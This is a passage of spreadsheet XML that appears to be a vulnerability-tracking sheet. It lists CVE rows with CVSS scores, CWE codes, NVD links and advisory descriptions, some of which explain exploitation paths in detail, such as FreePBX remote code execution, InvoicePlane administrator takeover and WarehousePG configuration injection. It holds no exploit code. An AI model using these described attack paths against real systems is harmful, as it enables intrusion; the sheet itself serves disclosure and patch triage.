          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 26.7.1 and iPadOS 26.7.1, macOS Sequoia 15.8.1, macOS Tahoe 26.7.1. Processing a maliciously crafted file may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 27.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86950</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87741</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>php, gin, rust, hp</t>
        </is>
      </c>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>The ConvertPlus plugin for WordPress is vulnerable to Deserialization of Untrusted Data in all versions up to, and including, 3.6.3 via the style parameter of the cp_display_preview_modal AJAX action. The vulnerability exists because the action's nonce guard is gated behind an isset() check and fails open when the cp_admin_page_nonce parameter is omitted entirely, no capability check is performed on the callback, and sanitize_text_field() — applied to the $style value before it is concatenated directly into a shortcode string evaluated by do_shortcode() — does not strip shortcode delimiters, allowing an attacker to inject a second, fully attacker-controlled [smile_modal] invocation that causes smile_modal_popup() to pass attacker-supplied base64-decoded bytes to maybe_unserialize() with no allowed_classes restriction. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject a PHP object.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t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87741</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88808</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr">
        <is>
          <t>rust, suse</t>
        </is>
      </c>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified within Rancher Manager where the Fleet agent wrote resources to downstream clusters using its own cluster-admin credentials instead of the ServiceAccount pinned to the deployment. It affects multi-tenancy environments where different tenants share the same downstream clusters, for example different privileged or untrusted teams inside the same organization. This could lead to overwritten configuration files.
This issue affected SUSE Rancher Fleet 0.16 before 0.16.2, 0.15 before 0.15.7, and 0.14 before 0.14.11.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88808</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90926</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>Improper Control of Generation of Code ('Code Injection') vulnerability in Innotim Software, Telecommunications and Consultancy Trade Ltd. Co. Logsign SIEM allows Code Injection.
This issue affects Logsign SIEM: from 6.4.101 before 6.4.117.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90926</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100371</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. In version 1.7.2, an authorization guard to Users::change_password(), was added to address a previous authorization flaw that allowed a secondary administrator (user_type=1, user_id != 1) to directly change the password of the primary administrator (user_id=1) through users/change_password/{id}. That remediation, however, protects only the direct password-change operation. It does not protect the identity attribute that password recovery actually trusts: user_email. Users::form() applies no equivalent object-level authorization check when editing the primary administrator's account, and user_email is not included in PROTECTED_FIELDS. A secondary administrator can therefore rewrite the primary administrator's email address, then drive the public password-recovery flow — which resolves the account by user_email — to receive the reset token and take over user_id=1. The result is an alternate attack path that achieves the same impact PR #1638 was intended to prevent: cross-administrator full account takeover of the primary administrator. This issue has been patched via commit 8616fa4.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100371</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48100</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-349</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>Payy is an Ethereum L2 zk-rollup for privacy preserving and regulatory compliant transactions. Prior to version 1.3.0, agg_agg forwards the compacted message stream from its inner proofs into a public messages: [Field; 1000] array, but it never checks that the unused tail of the outer array is zero. A registered prover can build a valid agg_final proof for an approved rollup block while inserting an extra burn message after the real messages. RollupV1.verifyRollup() then parses that public input as a normal burn and transfers USDC from the rollup contract to the attacker. This is a severe circuit soundness failure: the proof system accepts a public statement whose messages array is not fully derived from the verified inner proofs. On the current deployment, verifyRollup() is restricted to the existing allowlisted prover, so a fresh public caller cannot submit the invalid proof directly. That gate limits who can reach L1 today; it does not make the circuit statement sound. The issue becomes permissionless under the prover model described in the Payy whitepaper. Section 3.3.2 states: "To join as a prover, the prover is required to submit a small stake", and Section 3.3.1 states that if a prover fails to submit, "other nodes can submit the block proof instead." In that model, an attacker only needs to become a registered prover and use public validator approval data for an already approved block. This issue has been patched in version 1.3.0.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48100</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54675</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-434, CWE-73</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.10 and 17.0.5, a critical vulnerability exists in the sound language upload and conversion functionality that allows an authenticated attacker to perform arbitrary file writes, leading directly to remote code execution (RCE). Authentication with a known username is required. The vulnerability stems from insufficient path sanitization in the file conversion process, enabling path traversal attacks that place malicious PHP files in the web server's root directory. This issue has been patched in versions 16.0.10 and 17.0.5.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54675</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95104</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow vulnerability exists in BUFFALO Wi-Fi products. A non-authenticated crafted HTTP request may cause a denial-of-service (DoS) condition.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95104</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96538</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>20be33e2-bf35-4d13-8fad-18bd2f3e3659</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>postgresql, hp</t>
        </is>
      </c>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>WarehousePG (WHPG) 7.x before 7.6.0-WHPG is affected by a missing authorization vulnerability (CWE-862) in the built-in server-side file functions pg_file_write(text,text,bool), pg_file_rename(text,text,text), pg_file_unlink(text), and pg_logdir_ls(). These functions are executable by any authenticated database role with no GRANT required, because the REVOKE that contrib/adminpack applies to the equivalent functions was never carried over to WHPG core when their catalog entries were repointed to the ungated adminpack-derived implementations as part of Greenplum's merge to a PostgreSQL 12 base. A non-superuser can use pg_file_write, pg_file_rename, and pg_file_unlink to create, overwrite (append), rename, and delete files under the data and log directories, and can use pg_logdir_ls() to enumerate log file names. Because postgresql.auto.conf resides in the data directory, a non-superuser can append configuration directives such as shared_preload_libraries or archive_command to it, resulting in arbitrary code execution as the postgres operating system user on the next server restart or configuration reload. WarehousePG 6.x is not affected, as the equivalent functions there enforce a superuser check internally.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96538</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-42002</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr">
        <is>
          <t>express, python</t>
        </is>
      </c>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>A code injection vulnerability has been discovered in the Robot Operating System 2 (ROS 2) 'ros2topic' command-line tool, affecting all ROS 2 distributions from Crystal Clemmys up to and including Lyrical Luth and Rolling Ridley. The vulnerability lies in the 'hz' verb, which reports the publishing rate of a topic and accepts a user-provided Python expression via the --filter option. This input is passed directly to the eval() function without sanitization, allowing a local user to craft and execute arbitrary code.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-42002</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101002</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Netcore NBR200V2 1.3.241127.071246. Affected is the function system of the file /usr/bin/network_tools of the component Tools Ping Handler. Performing a manipulation of the argument url results in os command injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101002</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54674</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.39 and 17.0.7, users authenticated via User Control Panel (UCP) are able to execute arbitrary commands on the PBX as the webserver user (typically asterisk) using specially crafted HTTP strings. Authenticated access to UCP is required. Note that this is often more common for less-privileged users to have UCP access vs. the Administrator Control Panel (ACP) access (which is usually FreePBX higher-level administrator accounts only). Insufficient sanitization of certain URL parameters utilized by UCP did not fully account for malicious strings in these fields. This could result in binaries being executed on the host server by carefully chaining commands. This issue has been patched in versions 16.0.39 and 17.0.7.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54674</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54708</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-94</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.72 and 17.0.7, a critical vulnerability exists in the FreePBX backup Module that allows authenticated attackers to execute arbitrary code on the server. Authentication with a known username that has sufficient access permissions and/or write access to backup files is required. This vulnerability is caused by improper path sanitization in the backup restore functionality, enabling attackers to upload malicious PHP files to the web root directory. This issue has been patched in versions 16.0.72 and 17.0.7.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54708</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54710</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-94</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.40 and 17.0.7, a critical remote code execution (RCE) vulnerability exists in the superfecta module due to unsafe inclusion of arbitrary PHP files, allowing authenticated attackers to execute arbitrary PHP code on the server with the privileges of the web server user. Authentication with a known username is required. The vulnerability is rooted in the options and save_options cases in the Superfecta module's AJAX handler. The code dynamically includes PHP files from the sources/ directory based on user-supplied input. This allows an attacker to execute arbitrary code when combined with arbitrary directory creation (e.g., via the backup module) and file uploads that reveal full paths (e.g., via the soundlang module). This issue has been patched in versions 16.0.40 and 17.0.7.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54710</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75600</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to version 17.0.9, authenticated users who are authorized to access the GraphQL api module interface of FreePBX are able to execute arbitrary shell commands. Authenticated access to the api module is required. The PBX API module's documentation generator accepts an authenticated host parameter and uses it to build a shell command. The code path validates the generated OAuth access token before execution, but it does not validate or escape host. Compromise results in authenticated arbitrary shell command execution as the FreePBX web/PBX service user (typically asterisk.). This issue has been patched in version 17.0.9.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
